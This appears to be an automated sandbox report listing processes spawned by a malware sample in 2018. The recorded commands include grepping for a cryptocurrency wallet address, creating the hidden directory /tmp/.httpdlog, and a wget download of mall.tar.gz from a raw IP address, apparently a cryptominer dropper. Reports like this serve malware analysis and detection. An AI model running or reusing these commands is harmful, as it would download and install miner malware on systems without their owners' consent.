|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/bash |
| Arguments: | n/a |
| File size: | 1037528 bytes |
| MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/rm |
| Arguments: | rm -f /tmp/L1fyFAYhE5 |
| File size: | 60272 bytes |
| MD5 hash: | b79876063d894c449856cca508ecca7f |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/bash |
| Arguments: | n/a |
| File size: | 1037528 bytes |
| MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/bash |
| Arguments: | n/a |
| File size: | 1037528 bytes |
| MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/ps |
| Arguments: | ps -ef |
| File size: | 97408 bytes |
| MD5 hash: | 37339e5441057d422e61e8a471505337 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/bash |
| Arguments: | n/a |
| File size: | 1037528 bytes |
| MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/grep |
| Arguments: | grep 45UmGzutvMrfwgtBdzNUMi4EwZXVmhQTVHnuM7Pom6VYL84o5bhVX1PZ4DZ3wrkYRYjcHRnRkeGv8YJ5oXWLWwik4V8Ji7Z |
| File size: | 211224 bytes |
| MD5 hash: | fc9b0a0ff848b35b3716768695bf2427 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/bash |
| Arguments: | n/a |
| File size: | 1037528 bytes |
| MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/grep |
| Arguments: | grep -v grep |
| File size: | 211224 bytes |
| MD5 hash: | fc9b0a0ff848b35b3716768695bf2427 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/bash |
| Arguments: | n/a |
| File size: | 1037528 bytes |
| MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/mkdir |
| Arguments: | mkdir /tmp/.httpdlog |
| File size: | 76848 bytes |
| MD5 hash: | a97f666f21c85ec62ea47d022263ef41 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/bash |
| Arguments: | n/a |
| File size: | 1037528 bytes |
| MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /usr/bin/wget |
| Arguments: | wget http://115.236.92.99:54321/mall.tar.gz |
| File size: | 474656 bytes |
| MD5 hash: | 458ce58ac4b1aac3eafc287fa46bf92d |